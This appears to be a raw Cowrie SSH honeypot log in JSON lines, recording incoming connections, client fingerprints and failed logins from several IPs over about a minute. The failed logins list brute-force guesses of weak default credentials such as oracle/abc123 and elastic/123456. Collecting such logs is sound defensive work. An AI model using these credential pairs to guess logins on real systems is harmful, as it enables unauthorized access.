{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:28:46.939214Z","src_ip":"193.32.162.145","session":"b3c4880d134a"}
{"eventid":"cowrie.login.failed","username":"trading","password":"trading","message":"login attempt [trading/trading] failed","sensor":"my-vps","timestamp":"2025-08-28T09:28:47.031174Z","src_ip":"193.32.162.145","session":"b3c4880d134a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:48.065093Z","src_ip":"193.32.162.145","session":"b3c4880d134a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52892,"dst_ip":"1.2.3.4","dst_port":22,"session":"2519c438e8ad","protocol":"ssh","message":"New connection: 185.93.89.7:52892 (1.2.3.4:22) [session: 2519c438e8ad]","sensor":"my-vps","timestamp":"2025-08-28T09:28:51.192842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:28:51.194269Z","src_ip":"185.93.89.7","session":"2519c438e8ad"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:28:51.213854Z","src_ip":"185.93.89.7","session":"2519c438e8ad"}
{"eventid":"cowrie.login.failed","username":"index","password":"999999","message":"login attempt [index/999999] failed","sensor":"my-vps","timestamp":"2025-08-28T09:28:51.251815Z","src_ip":"185.93.89.7","session":"2519c438e8ad"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:52.281355Z","src_ip":"185.93.89.7","session":"2519c438e8ad"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55714,"dst_ip":"1.2.3.4","dst_port":22,"session":"21f04d827973","protocol":"ssh","message":"New connection: 51.79.164.132:55714 (1.2.3.4:22) [session: 21f04d827973]","sensor":"my-vps","timestamp":"2025-08-28T09:29:01.014324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:29:01.153180Z","src_ip":"51.79.164.132","session":"21f04d827973"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:29:01.883679Z","src_ip":"51.79.164.132","session":"21f04d827973"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T09:29:03.083669Z","src_ip":"51.79.164.132","session":"21f04d827973"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:04.643425Z","src_ip":"51.79.164.132","session":"21f04d827973"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:12.670814Z","src_ip":"212.227.235.229","session":"d54de3187d07"}
{"eventid":"cowrie.session.closed","duration":180.21483850479126,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:12.674447Z","src_ip":"212.227.235.229","session":"d54de3187d07"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40262,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3127c48159d","protocol":"ssh","message":"New connection: 185.93.89.7:40262 (1.2.3.4:22) [session: d3127c48159d]","sensor":"my-vps","timestamp":"2025-08-28T09:29:15.913746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:29:15.914764Z","src_ip":"185.93.89.7","session":"d3127c48159d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:29:15.934487Z","src_ip":"185.93.89.7","session":"d3127c48159d"}
{"eventid":"cowrie.login.failed","username":"index","password":"xxxxxx","message":"login attempt [index/xxxxxx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:29:16.022136Z","src_ip":"185.93.89.7","session":"d3127c48159d"}
{"eventid":"cowrie.session.closed","duration":30.590702295303345,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:16.166889Z","src_ip":"111.229.194.251","session":"035a70da4dff"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:17.044863Z","src_ip":"185.93.89.7","session":"d3127c48159d"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55800,"dst_ip":"1.2.3.4","dst_port":22,"session":"63f3646c9007","protocol":"ssh","message":"New connection: 51.79.164.132:55800 (1.2.3.4:22) [session: 63f3646c9007]","sensor":"my-vps","timestamp":"2025-08-28T09:29:27.149111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:29:27.223065Z","src_ip":"51.79.164.132","session":"63f3646c9007"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:29:27.597761Z","src_ip":"51.79.164.132","session":"63f3646c9007"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:29:29.278011Z","src_ip":"51.79.164.132","session":"63f3646c9007"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:30.787730Z","src_ip":"51.79.164.132","session":"63f3646c9007"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54046,"dst_ip":"1.2.3.4","dst_port":22,"session":"7821e8b84f78","protocol":"ssh","message":"New connection: 185.93.89.7:54046 (1.2.3.4:22) [session: 7821e8b84f78]","sensor":"my-vps","timestamp":"2025-08-28T09:29:40.833724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:29:40.847291Z","src_ip":"185.93.89.7","session":"7821e8b84f78"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:29:40.867886Z","src_ip":"185.93.89.7","session":"7821e8b84f78"}
{"eventid":"cowrie.login.failed","username":"index","password":"888888","message":"login attempt [index/888888] failed","sensor":"my-vps","timestamp":"2025-08-28T09:29:40.914616Z","src_ip":"185.93.89.7","session":"7821e8b84f78"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:42.011213Z","src_ip":"185.93.89.7","session":"7821e8b84f78"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45974,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb8312ef0ed6","protocol":"ssh","message":"New connection: 51.79.164.132:45974 (1.2.3.4:22) [session: bb8312ef0ed6]","sensor":"my-vps","timestamp":"2025-08-28T09:29:53.336482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:29:53.519251Z","src_ip":"51.79.164.132","session":"bb8312ef0ed6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:29:53.541482Z","src_ip":"51.79.164.132","session":"bb8312ef0ed6"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:29:56.622972Z","src_ip":"51.79.164.132","session":"bb8312ef0ed6"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:29:57.810313Z","src_ip":"51.79.164.132","session":"bb8312ef0ed6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57464,"dst_ip":"1.2.3.4","dst_port":22,"session":"61954aad3264","protocol":"ssh","message":"New connection: 185.93.89.7:57464 (1.2.3.4:22) [session: 61954aad3264]","sensor":"my-vps","timestamp":"2025-08-28T09:30:05.167081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:30:05.168103Z","src_ip":"185.93.89.7","session":"61954aad3264"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:30:05.186723Z","src_ip":"185.93.89.7","session":"61954aad3264"}
{"eventid":"cowrie.login.failed","username":"index","password":"333333","message":"login attempt [index/333333] failed","sensor":"my-vps","timestamp":"2025-08-28T09:30:05.239088Z","src_ip":"185.93.89.7","session":"61954aad3264"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:06.290025Z","src_ip":"185.93.89.7","session":"61954aad3264"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53048,"dst_ip":"1.2.3.4","dst_port":22,"session":"7afdbe858811","protocol":"ssh","message":"New connection: 51.79.164.132:53048 (1.2.3.4:22) [session: 7afdbe858811]","sensor":"my-vps","timestamp":"2025-08-28T09:30:20.162000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:30:20.505446Z","src_ip":"51.79.164.132","session":"7afdbe858811"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:30:20.506256Z","src_ip":"51.79.164.132","session":"7afdbe858811"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:30:23.804924Z","src_ip":"51.79.164.132","session":"7afdbe858811"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:25.089432Z","src_ip":"51.79.164.132","session":"7afdbe858811"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54786,"dst_ip":"1.2.3.4","dst_port":22,"session":"70d673271b1a","protocol":"ssh","message":"New connection: 217.72.205.35:54786 (1.2.3.4:22) [session: 70d673271b1a]","sensor":"my-vps","timestamp":"2025-08-28T09:30:26.097256Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:26.098396Z","src_ip":"217.72.205.35","session":"70d673271b1a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":58774,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ae130301e77","protocol":"ssh","message":"New connection: 185.93.89.7:58774 (1.2.3.4:22) [session: 4ae130301e77]","sensor":"my-vps","timestamp":"2025-08-28T09:30:29.169336Z"}
